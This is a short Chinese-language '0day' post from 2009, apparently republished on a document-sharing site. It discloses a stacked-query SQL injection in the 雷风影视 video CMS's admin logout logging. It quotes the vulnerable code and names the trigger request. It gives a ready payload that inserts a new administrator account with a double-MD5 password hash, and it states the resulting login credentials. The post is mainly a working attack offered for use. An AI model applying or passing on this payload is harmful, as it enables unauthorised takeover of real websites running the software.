龙影
发布时间:2009-11-9
针对SQL和未改后台地址版本
漏洞描述:admin/inc/.asp 124行
引用
conn.execute("INSERT INTO "&web_dbtop&"log (logcontent,logtime,logname,logip) VALUES ("&logcontent&","&logtime&","&Request.s(web_url)("AdminName")&","&usersip()&")")
这里的web_url是当前网站地址
这个在admin_login.asp?action=logout的时候调用了一次
admin_login.asp 164行call addlog("退出登陆")
所以在提交admin_login.asp?action=logout请求时,更改你的AdminName的就可以进行多语句执行注入了,
雷风影视系统0day
,电脑资料
《雷风影视系统0day》(http://meiwen.anslib.com)。例如把值更改为:web_url=AdminName=a,127.0.0.1);insert into lf_admin ([name],[password])values(yglh,14e1b600b1fd579f47433b88e8d85291)--;
然后就可以用yglh和密码为123456的登录了。
PS:他们的MD5值是经过两次MD5的。所以是14e1b600b1fd579f47433b88e8d85291